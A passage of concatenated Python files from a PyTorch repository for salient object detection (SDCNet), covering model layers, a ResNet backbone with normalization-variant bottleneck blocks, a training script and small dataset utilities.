elif c[i] == 2:
F3[i, :, :, :] = self.reduce2_2(
torch.cat((F2[i, :, :, :].unsqueeze(0), layer2[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 3:
F3[i, :, :, :] = self.reduce2_3(
torch.cat((F2[i, :, :, :].unsqueeze(0), layer2[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 4:
F3[i, :, :, :] = self.reduce2_4(
torch.cat((F2[i, :, :, :].unsqueeze(0), layer2[i, :, :, :].unsqueeze(0)), 1))
predict3 = self.predict3(F3) + predict2
predict3 = F.interpolate(predict3, size=l1_size, mode='bilinear', align_corners=True)
F3 = F.interpolate(F3, size=l1_size, mode='bilinear', align_corners=True)
F4 = F3[:, :, :, :].clone().detach()
for i in range(len(c)):
if c[i] == 0:
F4[i, :, :, :] = self.reduce1_0(
torch.cat((F3[i, :, :, :].unsqueeze(0), layer1[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 1:
F4[i, :, :, :] = self.reduce1_1(
torch.cat((F3[i, :, :, :].unsqueeze(0), layer1[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 2:
F4[i, :, :, :] = self.reduce1_2(
torch.cat((F3[i, :, :, :].unsqueeze(0), layer1[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 3:
F4[i, :, :, :] = self.reduce1_3(
torch.cat((F3[i, :, :, :].unsqueeze(0), layer1[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 4:
F4[i, :, :, :] = self.reduce1_4(
torch.cat((F3[i, :, :, :].unsqueeze(0), layer1[i, :, :, :].unsqueeze(0)), 1))
predict4 = self.predict4(F4) + predict3
F5 = self.reduce5(torch.cat((F4, layer0), 1))
predict5 = self.predict5(F5) + predict4
F0 = F4[:, :, :, :].clone().detach()
for i in range(len(c)):
if c[i] == 0:
F0[i, :, :, :] = self.reduce0_0(layer0[i, :, :, :].unsqueeze(0))
elif c[i] == 1:
F0[i, :, :, :] = self.reduce0_1(layer0[i, :, :, :].unsqueeze(0))
elif c[i] == 2:
F0[i, :, :, :] = self.reduce0_2(layer0[i, :, :, :].unsqueeze(0))
elif c[i] == 3:
F0[i, :, :, :] = self.reduce0_3(layer0[i, :, :, :].unsqueeze(0))
elif c[i] == 4:
F0[i, :, :, :] = self.reduce0_4(layer0[i, :, :, :].unsqueeze(0))
F1 = F.interpolate(F1, size=l1_size, mode='bilinear', align_corners=True)
F2 = F.interpolate(F2, size=l1_size, mode='bilinear', align_corners=True)
F6 = self.reduce6(torch.cat((F0, F5), 1))
F7 = self.reduce7(torch.cat((F0, F4), 1))
F8 = self.reduce8(torch.cat((F0, F3), 1))
F9 = self.reduce9(torch.cat((F0, F2), 1))
F10 = self.reduce10(torch.cat((F0, F1), 1))
predict6 = self.predict6(F6) + predict5
predict7 = self.predict7(F7) + predict6
predict8 = self.predict8(F8) + predict7
predict9 = self.predict9(F9) + predict8
predict10 = self.predict10(F10) + predict9
predict11 = predict6 + predict7 + predict8 + predict9 + predict10
predict1 = F.interpolate(predict1, size=x.size()[2:], mode='bilinear', align_corners=True)
predict2 = F.interpolate(predict2, size=x.size()[2:], mode='bilinear', align_corners=True)
predict3 = F.interpolate(predict3, size=x.size()[2:], mode='bilinear', align_corners=True)
predict4 = F.interpolate(predict4, size=x.size()[2:], mode='bilinear', align_corners=True)
predict5 = F.interpolate(predict5, size=x.size()[2:], mode='bilinear', align_corners=True)
predict6 = F.interpolate(predict6, size=x.size()[2:], mode='bilinear', align_corners=True)
predict7 = F.interpolate(predict7, size=x.size()[2:], mode='bilinear', align_corners=True)
predict8 = F.interpolate(predict8, size=x.size()[2:], mode='bilinear', align_corners=True)
predict9 = F.interpolate(predict9, size=x.size()[2:], mode='bilinear', align_corners=True)
predict10 = F.interpolate(predict10, size=x.size()[2:], mode='bilinear', align_corners=True)
predict11 = F.interpolate(predict11, size=x.size()[2:], mode='bilinear', align_corners=True)
if self.training:
return p5, p4, p3, p2, p1, predict1, predict2, predict3, predict4, predict5, predict6, predict7, predict8, predict9, predict10, predict11
return F.sigmoid(predict11)
#----------------------------------------------------------------------------------------
class _ASPP(nn.Module):
def __init__(self, in_dim):
super(_ASPP, self).__init__()
down_dim = in_dim // 2
self.conv1 = nn.Sequential(
nn.Conv2d(in_dim, down_dim, kernel_size=1), nn.BatchNorm2d(down_dim), nn.PReLU()
)
self.conv2 = nn.Sequential(
nn.Conv2d(in_dim, down_dim, kernel_size=3, dilation=2, padding=2), nn.BatchNorm2d(down_dim), nn.PReLU()
)
self.conv3 = nn.Sequential(
nn.Conv2d(in_dim, down_dim, kernel_size=3, dilation=4, padding=4), nn.BatchNorm2d(down_dim), nn.PReLU()
)
self.conv4 = nn.Sequential(
nn.Conv2d(in_dim, down_dim, kernel_size=3, dilation=6, padding=6), nn.BatchNorm2d(down_dim), nn.PReLU()
)
self.conv5 = nn.Sequential(
nn.Conv2d(in_dim, down_dim, kernel_size=1), nn.BatchNorm2d(down_dim), nn.PReLU()
)
self.fuse = nn.Sequential(
nn.Conv2d(5 * down_dim, in_dim, kernel_size=1), nn.BatchNorm2d(in_dim), nn.PReLU()
)
def forward(self, x):
conv1 = self.conv1(x)
conv2 = self.conv2(x)
conv3 = self.conv3(x)
conv4 = self.conv4(x)
conv5 = F.interpolate(self.conv5(F.adaptive_avg_pool2d(x, 1)), size=x.size()[2:], mode='bilinear',
align_corners=True)
return self.fuse(torch.cat((conv1, conv2, conv3, conv4, conv5), 1))
|
Python
| 529
| 52.631378
| 149
|
/model.py
| 0.556625
| 0.46396
|
Sssssbo/SDCNet
|
refs/heads/master
|
import numpy as np
import os
import torch
from PIL import Image
from torch.autograd import Variable
from torchvision import transforms
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import pandas as pd
from tqdm import tqdm
import cv2
import numpy as np
from config import ecssd_path, hkuis_path, pascals_path, sod_path, dutomron_path, MTDD_test_path
from misc import check_mkdir, crf_refine, AvgMeter, cal_precision_recall_mae, cal_fmeasure
from datasets import TestFolder_joint
import joint_transforms
from model import HSNet_single1, HSNet_single1_ASPP, HSNet_single1_NR, HSNet_single2, SDMS_A, SDMS_C
torch.manual_seed(2018)
# set which gpu to use
torch.cuda.set_device(0)
ckpt_path = './ckpt'
test_path = './test_ECSSD.csv'
def main():
img = np.zeros((512, 512),dtype = np.uint8)
img2 = cv2.imread('./0595.PNG', 0)
cv2.imshow('img',img2)
#cv2.waitKey(0)
print(img, img2)
Image.fromarray(img).save('./free.png')
if __name__ == '__main__':
main()
|
Python
| 41
| 24.024391
| 100
|
/create_free.py
| 0.719298
| 0.691033
|
Sssssbo/SDCNet
|
refs/heads/master
|
import numpy as np
import os
import torch
from PIL import Image
from torch.autograd import Variable
from torchvision import transforms
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import pandas as pd
from tqdm import tqdm
path_list = ['msra10k', 'ECSSD', 'DUT-OMROM', 'DUTS-TR', 'DUTS-TE', 'HKU-IS', 'PASCAL-S', 'SED2', 'SOC', 'SOD', 'THUR-15K']
def main():
Dataset, Class0, Class1, Class2, Class3, Class4, Class5, Class6, Class7, Class8, Class9, Class10, Total = [], [], [], [], [], [], [], [], [], [], [], [], []
for data_path in path_list:
test_path = './SOD_label/label_' + data_path + '.csv'
print('Evalute for ' + test_path)
test_data = pd.read_csv(test_path)
imgs = []
num, c0, c1, c2, c3, c4, c5, c6, c7, c8, c9, c10 = 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
for index, row in test_data.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
img_path, gt_path, label = imgs[index]
if label == 0:
c0 += 1
elif label == 1:
c1 += 1
elif label == 2:
c2 += 1
elif label == 3:
c3 += 1
elif label == 4:
c4 += 1
elif label == 5:
c5 += 1
elif label == 6:
c6 += 1
elif label == 7:
c7 += 1
elif label == 8:
c8 += 1
elif label == 9:
c9 += 1
elif label == 10:
c10 += 1
num += 1
print('[Class0 %.f], [Class1 %.f], [Class2 %.f], [Class3 %.f]\n'\
'[Class4 %.f], [Class5 %.f], [Class6 %.f], [Class7 %.f]\n'\
'[Class8 %.f], [Class9 %.f], [Class10 %.f], [Total %.f]\n'%\
(c0, c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, num)
)
Dataset.append(data_path)
Class0.append(c0)
Class1.append(c1)
Class2.append(c2)
Class3.append(c3)
Class4.append(c4)
Class5.append(c5)
Class6.append(c6)
Class7.append(c7)
Class8.append(c8)
Class9.append(c9)
Class10.append(c10)
Total.append(num)
label_file = pd.DataFrame({'Datasets': Dataset, 'Class 0': Class0, 'Class 1': Class1, 'Class 2': Class2, 'Class 3': Class3, 'Class 4': Class4, 'Class 5': Class5, 'Class 6': Class6, 'Class 7': Class7, 'Class 8': Class8, 'Class 9': Class9, 'Class 10': Class10, 'Num of Pic': Total})
label_file = label_file[['Datasets', 'Class 0', 'Class 1', 'Class 2', 'Class 3', 'Class 4', 'Class 5', 'Class 6', 'Class 7', 'Class 8', 'Class 9', 'Class 10', 'Num of Pic']]
label_file.to_csv('./Dataset_statistics.csv', index=False)
if __name__ == '__main__':
main()
|
Python
| 75
| 36.813332
| 284
|
/count_dataset.py
| 0.492595
| 0.435825
|
Sssssbo/SDCNet
|
refs/heads/master
|
import datetime
import os
import time
import torch
from torch import nn
from torch import optim
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import transforms
import pandas as pd
import numpy as np
import joint_transforms
from config import msra10k_path, MTDD_train_path
from datasets import ImageFolder_joint
from misc import AvgMeter, check_mkdir, cal_sc
from model import R3Net, SDCNet
from torch.backends import cudnn
cudnn.benchmark = True
torch.manual_seed(2021)
torch.cuda.set_device(6)
csv_path = './label_DUTS-TR.csv'
ckpt_path = './ckpt'
exp_name ='SDCNet'
args = {
'iter_num': 30000,
'train_batch_size': 16,
'last_iter': 0,
'lr': 1e-3,
'lr_decay': 0.9,
'weight_decay': 5e-4,
'momentum': 0.9,
'snapshot': ''
}
joint_transform = joint_transforms.Compose([
joint_transforms.RandomCrop(300),
joint_transforms.RandomHorizontallyFlip(),
joint_transforms.RandomRotate(10)
])
img_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
target_transform = transforms.ToTensor()
to_pil = transforms.ToPILImage()
all_data = pd.read_csv(csv_path)
train_set = ImageFolder_joint(all_data, joint_transform, img_transform, target_transform)
train_loader = DataLoader(train_set, batch_size=args['train_batch_size'], num_workers=0, shuffle=True, drop_last=True)#
log_path = os.path.join(ckpt_path, exp_name, str(datetime.datetime.now()) + '.txt')
def main():
net = SDCNet(num_classes = 5).cuda().train() #
print('training in ' + exp_name)
optimizer = optim.SGD([
{'params': [param for name, param in net.named_parameters() if name[-4:] == 'bias'],
'lr': 2 * args['lr']},
{'params': [param for name, param in net.named_parameters() if name[-4:] != 'bias'],
'lr': args['lr'], 'weight_decay': args['weight_decay']}
], momentum=args['momentum'])
if len(args['snapshot']) > 0:
print('training resumes from ' + args['snapshot'])
net.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '.pth')))
optimizer.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '_optim.pth')))
optimizer.param_groups[0]['lr'] = 2 * args['lr']
optimizer.param_groups[1]['lr'] = args['lr']
check_mkdir(ckpt_path)
check_mkdir(os.path.join(ckpt_path, exp_name))
open(log_path, 'w').write(str(args) + '\n\n')
train(net, optimizer)
def train(net, optimizer):
start_time = time.time()
curr_iter = args['last_iter']
num_class = [0, 0, 0, 0, 0]
while True:
total_loss_record, loss0_record, loss1_record, loss2_record = AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter()
batch_time = AvgMeter()
end = time.time()
print('-----begining the first stage, train_mode==0-----')
for i, data in enumerate(train_loader):
optimizer.param_groups[0]['lr'] = 2 * args['lr'] * (1 - float(curr_iter) / args['iter_num']
) ** args['lr_decay']
optimizer.param_groups[1]['lr'] = args['lr'] * (1 - float(curr_iter) / args['iter_num']
) ** args['lr_decay']
inputs, gt, labels = data
print(labels)
# depends on the num of classes
cweight = torch.tensor([0.5, 0.75, 1, 1.25, 1.5])
#weight = torch.ones(size=gt.shape)
weight = gt.clone().detach()
sizec = labels.numpy()
#ta = np.zeros(shape=gt.shape)
'''
np.zeros(shape=labels.shape)
sc = gt.clone().detach()
for i in range(len(sizec)):
gta = np.array(to_pil(sc[i,:].data.squeeze(0).cpu()))#
#print(gta.shape)
labels[i] = cal_sc(gta)
sizec[i] = labels[i]
print(labels)
'''
batch_size = inputs.size(0)
inputs = Variable(inputs).cuda()
gt = Variable(gt).cuda()
labels = Variable(labels).cuda()
#print(sizec.shape)
optimizer.zero_grad()
p5, p4, p3, p2, p1, predict1, predict2, predict3, predict4, predict5, predict6, predict7, predict8, predict9, predict10, predict11 = net(inputs, sizec) # mode=1
criterion = nn.BCEWithLogitsLoss().cuda()
criterion2 = nn.CrossEntropyLoss().cuda()
gt2 = gt.long()
gt2 = gt2.squeeze(1)
l5 = criterion2(p5, gt2)
l4 = criterion2(p4, gt2)
l3 = criterion2(p3, gt2)
l2 = criterion2(p2, gt2)
l1 = criterion2(p1, gt2)
loss0 = criterion(predict11, gt)
loss10 = criterion(predict10, gt)
loss9 = criterion(predict9, gt)
loss8 = criterion(predict8, gt)
loss7 = criterion(predict7, gt)
loss6 = criterion(predict6, gt)
loss5 = criterion(predict5, gt)
loss4 = criterion(predict4, gt)
loss3 = criterion(predict3, gt)
loss2 = criterion(predict2, gt)
loss1 = criterion(predict1, gt)
total_loss = l1 + l2 + l3 + l4 + l5 + loss0 + loss1 + loss2 + loss3 + loss4 + loss5 + loss6 + loss7 + loss8 + loss9 + loss10
total_loss.backward()
optimizer.step()
total_loss_record.update(total_loss.item(), batch_size)
loss1_record.update(l5.item(), batch_size)
loss0_record.update(loss0.item(), batch_size)
curr_iter += 1.0
batch_time.update(time.time() - end)
end = time.time()
log = '[iter %d], [R1/Mode0], [total loss %.5f]\n' \
'[l5 %.5f], [loss0 %.5f]\n' \
'[lr %.13f], [time %.4f]' % \
(curr_iter, total_loss_record.avg, loss1_record.avg, loss0_record.avg, optimizer.param_groups[1]['lr'],
batch_time.avg)
print(log)
print('Num of class:', num_class)
open(log_path, 'a').write(log + '\n')
if curr_iter == args['iter_num']:
torch.save(net.state_dict(), os.path.join(ckpt_path, exp_name, '%d.pth' % curr_iter))
torch.save(optimizer.state_dict(),
os.path.join(ckpt_path, exp_name, '%d_optim.pth' % curr_iter))
total_time = time.time() - start_time
print(total_time)
return
if __name__ == '__main__':
main()
|
Python
| 184
| 35.255436
| 172
|
/SDCNet.py
| 0.558087
| 0.529006
|
Sssssbo/SDCNet
|
refs/heads/master
|
import math
import torch
from torch import nn
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class GDN_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(GDN_Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1_0 = nn.BatchNorm2d(
planes, affine=False, track_running_stats=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2_0 = nn.BatchNorm2d(
planes, affine=False, track_running_stats=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3_0 = nn.BatchNorm2d(
planes * 4, affine=False, track_running_stats=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.in1 = nn.InstanceNorm2d(planes)
self.in2 = nn.InstanceNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out1 = torch.zeros_like(out)
if self.training == True:
#print("training with gdn block")
out1[:8] = self.bn1_0(out[:8])
out1[8:16] = self.bn1_0(out[8:16])
out1[16:] = self.bn1_0(out[16:])
else:
#print("test for gdn block")
out1 = self.in1(out)
out = self.bn1(out1)
out = self.relu(out)
out = self.conv2(out)
out1 = torch.zeros_like(out)
if self.training == True:
out1[:8] = self.bn2_0(out[:8])
out1[8:16] = self.bn2_0(out[8:16])
out1[16:] = self.bn2_0(out[16:])
else:
out1 = self.in1(out)
out = self.bn2(out1)
out = self.relu(out)
out = self.conv3(out)
out1 = torch.zeros_like(out)
if self.training == True:
out1[:8] = self.bn3_0(out[:8])
out1[8:16] = self.bn3_0(out[8:16])
out1[16:] = self.bn3_0(out[16:])
else:
out1 = self.in2(out)
out = self.bn3(out1)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class IN_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(IN_Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.in1_0 = nn.InstanceNorm2d(planes)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.in2_0 = nn.InstanceNorm2d(planes)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.in3_0 = nn.InstanceNorm2d(planes * 4)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.in1_0(out)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.in2_0(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.in3_0(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class IN2_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(IN2_Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.in1_0 = nn.InstanceNorm2d(planes)
self.conv1_1 = nn.Sequential(
nn.Conv2d(planes * 2, planes, kernel_size=3, padding=1, bias=False), nn.BatchNorm2d(planes), nn.ReLU(inplace=True)
)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.in2_0 = nn.InstanceNorm2d(planes)
self.conv2_1 = nn.Sequential(
nn.Conv2d(planes * 2, planes, kernel_size=3, padding=1, bias=False), nn.BatchNorm2d(planes), nn.ReLU(inplace=True)
)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.in3_0 = nn.InstanceNorm2d(planes * 4)
self.conv3_1 = nn.Sequential(
nn.Conv2d(planes * 8, planes * 4, kernel_size=1, bias=False), nn.BatchNorm2d(planes * 4)
)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
x1 = self.conv1(x)
out1 = self.in1_0(x1)
out1 = self.bn1(out1)
out1 = self.relu(out1)
x1 = self.conv1_1(torch.cat((out1,x1),1))
x2 = self.conv2(x1)
out2 = self.in2_0(x2)
out2 = self.bn2(out2)
out2 = self.relu(out2)
x2 = self.conv2_1(torch.cat((out2,x2),1))
x3 = self.conv3(x2)
out3 = self.in3_0(x3)
out3 = self.bn3(out3)
out3 = self.relu(out3)
x3 = self.conv3_1(torch.cat((out3,x3),1))
if self.downsample is not None:
residual = self.downsample(residual)
x3 += residual
x3 = self.relu(x3)
return x3
class SNR_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(SNR_Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.in1_0 = nn.InstanceNorm2d(planes)
self.conv1_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn1_1 = nn.BatchNorm2d(planes)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.in2_0 = nn.InstanceNorm2d(planes)
self.conv2_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn2_1 = nn.BatchNorm2d(planes)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.in3_0 = nn.InstanceNorm2d(planes * 4)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
x1 = self.conv1(x)
out1 = self.in1_0(x1)
res1 = x1 - out1
res1 = self.conv1_1(res1)
res1 = self.bn1_1(res1)
res1 = self.relu(res1)
x1 = self.bn1(x1)
x1 = out1 + res1
x1 = self.relu(x1)
x2 = self.conv2(x1)
out2 = self.in2_0(x2)
res2 = x2 - out2
res2 = self.conv2_1(res2)
res2 = self.bn2_1(res2)
res2 = self.relu(res2)
x2 = self.bn2(x2)
x2 = out2 + res2
x2 = self.relu(x2)
x3 = self.conv3(x2)
x3 = self.bn3(x3)
if self.downsample is not None:
residual = self.downsample(residual)
x3 += residual
x3 = self.relu(x3)
return x3
class SNR2_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(SNR2_Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.in1_0 = nn.InstanceNorm2d(planes)
self.conv1_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn1_1 = nn.BatchNorm2d(planes)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.in2_0 = nn.InstanceNorm2d(planes)
self.conv2_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn2_1 = nn.BatchNorm2d(planes)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.in3_0 = nn.InstanceNorm2d(planes * 4)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
def forward(self, x):
residual = x
x1 = self.conv1(x)
out1 = self.in1_0(x1)
res1 = x1 - out1
res1 = self.conv1_1(res1)
res1 = self.bn1_1(res1)
res1 = self.relu(res1)
x1 = out1 + res1
x1 = self.bn1(x1)
x1 = self.relu(x1)
x2 = self.conv2(x1)
out2 = self.in2_0(x2)
if self.stride == 2: res1 = self.maxpool(res1)
res2 = x2 - out2 + res1
res2 = self.conv2_1(res2)
res2 = self.bn2_1(res2)
res2 = self.relu(res2)
x2 = out2 + res2
x2 = self.bn2(x2)
x2 = self.relu(x2)
x3 = self.conv3(x2)
x3 = self.bn3(x3)
if self.downsample is not None:
residual = self.downsample(residual)
x3 += residual
x3 = self.relu(x3)
return x3
class SNR3_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(SNR3_Bottleneck, self).__init__()
self.in1 = nn.InstanceNorm2d(planes)
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv1_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn1_1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn2_1 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.in3 = nn.InstanceNorm2d(planes * 4)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
def forward(self, x, x_2=None, x_1=None, r2=None, r1=None):
if type(x) is tuple:
# print(len(x))
x_2 = x[1]
x_1 = x[2]
r2 = x[3]
r1 = x[4]
x = x[0]
residual = x
x1 = self.conv1(x)
out1 = self.in1(x1)
res1 = x1 - out1
res1 = self.conv1_1(res1)
res1 = self.bn1_1(res1)
res1 = self.relu(res1)
# print(out1.shape)
# print(res1.shape)
# print(x1.shape)
x1 = out1 + res1
x1 = self.bn1(x1)
x1 = self.relu(x1)
x2 = self.conv2(x1)
out2 = self.in1(x2)
res2 = x2 - out2
res2 = self.conv2_1(res2)
res2 = self.bn2_1(res2)
res2 = self.relu(res2)
x2 = out2 + res2
x2 = self.bn2(x2)
x2 = self.relu(x2)
x3 = self.conv3(x2)
x3 = self.bn3(x3)
if self.downsample is not None:
residual = self.downsample(residual)
x3 += residual
x3 = self.relu(x3)
if x_2 is not None: x2 = x2 + x_2
if x_1 is not None: x1 = x1 + x_1
if r2 is not None: res2 = res2 + r2
if r1 is not None: res1 = res1 + r1
'''
print(x3.shape)
print(x2.shape)
print(x1.shape)
print(res2.shape)
print(res1.shape)
'''
if self.stride == 2:
x1 = self.maxpool(x1)
res1 = self.maxpool(res1)
return x3, x2, x1, res2, res1
class SNR4_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(SNR4_Bottleneck, self).__init__()
self.in1 = nn.InstanceNorm2d(planes)
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv1_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn1_1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn2_1 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.in3 = nn.InstanceNorm2d(planes * 4)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
def forward(self, x, x_2=None, x_1=None, r2=None, r1=None):
if type(x) is tuple:
# print(len(x))
x_2 = x[1]
x_1 = x[2]
r2 = x[3]
r1 = x[4]
x = x[0]
residual = x
x1 = self.conv1(x)
out1 = self.in1(x1)
res1 = x1 - out1
res1 = self.conv1_1(res1)
res1 = self.bn1_1(res1)
res1 = self.relu(res1)
# print(out1.shape)
# print(res1.shape)
# print(x1.shape)
x1 = out1 + res1
x1 = self.bn1(x1)
x1 = self.relu(x1)
x2 = self.conv2(x1)
out2 = self.in1(x2)
res2 = x2 - out2
res2 = self.conv2_1(res2)
res2 = self.bn2_1(res2)
res2 = self.relu(res2)
x2 = out2 + res2
x2 = self.bn2(x2)
x2 = self.relu(x2)
x3 = self.conv3(x2)
x3 = self.bn3(x3)
if self.downsample is not None:
residual = self.downsample(residual)
x3 += residual
x3 = self.relu(x3)
if x_2 is not None: x2 = x2 + x_2
if x_1 is not None: x1 = x1 + x_1
if r2 is not None: res2 = res2 + r2
if r1 is not None: res1 = res1 + r1
'''
print(x3.shape)
print(x2.shape)
print(x1.shape)
print(res2.shape)
print(res1.shape)
'''
if self.stride == 2:
x1 = self.maxpool(x1)
res1 = self.maxpool(res1)
return x3, x2, x1, res2, res1
# --------------------------------- resnet-----------------------------------
class ResNet(nn.Module):
def __init__(self, last_stride=2, block=Bottleneck, frozen_stages=-1, layers=[3, 4, 6, 3]):
self.inplanes = 64
super().__init__()
print(block)
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
